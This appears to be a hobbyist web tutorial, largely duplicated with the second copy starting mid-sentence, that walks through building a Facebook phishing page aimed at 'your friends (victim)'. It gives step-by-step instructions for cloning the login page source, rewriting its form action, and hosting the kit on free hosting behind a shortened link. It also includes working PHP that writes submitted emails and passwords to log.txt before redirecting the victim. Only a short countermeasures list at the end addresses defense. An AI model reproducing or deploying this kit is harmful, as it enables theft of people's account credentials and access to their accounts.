Phishing is - Tricking your friends (victim) into logging into Facebook or other websites using your custom-
made webpage which is not the real page. So when they put their details like email/password into your fake
login page, you will receive the information and you can see their password.
What you need to phish:
1) a web host site, try 5gbfree.com or 000webhost.com (webhost is a place where you can keep your custom made website with a given link if you cunt afford a domain)
2) a PHP file which will redirect the victim to another url.
3) the fake login page (index.htm)
4) text storage file (log.txt) where you can see the password in that file.
5) a little sense of logic and brains if you don't know anything about this stuff.
6) url shortener website (optional), you don't want to send an obvious fake url to people right ?
HERE WE GO...
1) first you gotta get the 3 necessary files (index.htm, post.php, log.txt), the index.htm file is what your victim will see as their fake login page. the post.php file is the PHP file that redirects the victim to another page and sends their login to the log.txt file where you can see the password and email.
2) Go to facebook.com homepage where you can see the sign-in. if you're using chrome and mozilla, you can right-click on the mouse and click on view page source.
3) Select all (CTRL+A) and COPY them to a notepad file. Save it as index.htm
4) Paste these codes into a notepad file. Before you save as index.htm, you need to edit something. FIND for ACTION. do that by (CTRL+F) and type in ACTION. find 2-3 times till you get something like that in the picture. once you find the action. replace the url next to the action with 'post.php'. replace https:/ until login_attempt]. Then save the notepad as index.htm and keep it in a folder.
5) That is your index.htm file. 1 done 3 to go.
6) Now we need your php file. post.php
7) open another notepad. copy the code below and paste them in the notepad.
<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”log.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
9) then save it as post.php
10) that is your post.php file
11) now just open another notepad. dont write anything. just save it as blank.. save the notepad as log.txt
12) that is your log.txt file where you can see the password.
13) MAKE an account on free web host and upload the 3 files. MAKE SURE ONLY THE THREE FILES ARE IN THE FOLDER DIRECTORY. do not keep other files in the folder with the three files. ONLY THE 3 FILES MUST BE THERE.
14) then once u uploaded, send the url to your friend and they will see your site. they login and you can see their password in the log.txt file. just open the log.txt
made webpage which is not the real page. So when they put their details like email/password into your fake
login page, you will receive the information and you can see their password.
What you need to phish:
1) a web host site, try 5gbfree.com or 000webhost.com (webhost is a place where you can keep your custom made website with a given link if you cunt afford a domain)
2) a PHP file which will redirect the victim to another url.
3) the fake login page (index.htm)
4) text storage file (log.txt) where you can see the password in that file.
5) a little sense of logic and brains if you don't know anything about this stuff.
6) url shortener website (optional), you don't want to send an obvious fake url to people right ?
HERE WE GO...
1) first you gotta get the 3 necessary files (index.htm, post.php, log.txt), the index.htm file is what your victim will see as their fake login page. the post.php file is the PHP file that redirects the victim to another page and sends their login to the log.txt file where you can see the password and email.
2) Go to facebook.com homepage where you can see the sign-in. if you're using chrome and mozilla, you can right-click on the mouse and click on view page source.
3) Select all (CTRL+A) and COPY them to a notepad file. Save it as index.htm
4) Paste these codes into a notepad file. Before you save as index.htm, you need to edit something. FIND for ACTION. do that by (CTRL+F) and type in ACTION. find 2-3 times till you get something like that in the picture. once you find the action. replace the url next to the action with 'post.php'. replace https:/ until login_attempt]. Then save the notepad as index.htm and keep it in a folder.
5) That is your index.htm file. 1 done 3 to go.
6) Now we need your php file. post.php
7) open another notepad. copy the code below and paste them in the notepad.
<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”log.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
8) now replace the Location: with some url you want your victim to go to. after they login with your page, they can see this location page.
9) then save it as post.php
10) that is your post.php file
11) now just open another notepad. dont write anything. just save it as blank.. save the notepad as log.txt
12) that is your log.txt file where you can see the password.
13) MAKE an account on free web host and upload the 3 files. MAKE SURE ONLY THE THREE FILES ARE IN THE FOLDER DIRECTORY. do not keep other files in the folder with the three files. ONLY THE 3 FILES MUST BE THERE.
14) then once u uploaded, send the url to your friend and they will see your site. they login and you can see their password in the log.txt file. just open the log.txt
Countermeasures :
1. Look carefully the address when you open a website that ask for your credentials. It's better you type it by yourself 
2. Change your password (and all the same password:e-mail, twitter, etc) ASAP when you know this attack happen
3.Install URL advisor(usually this you can get from antivirus for free) but not too effective.
Hope you found it useful 
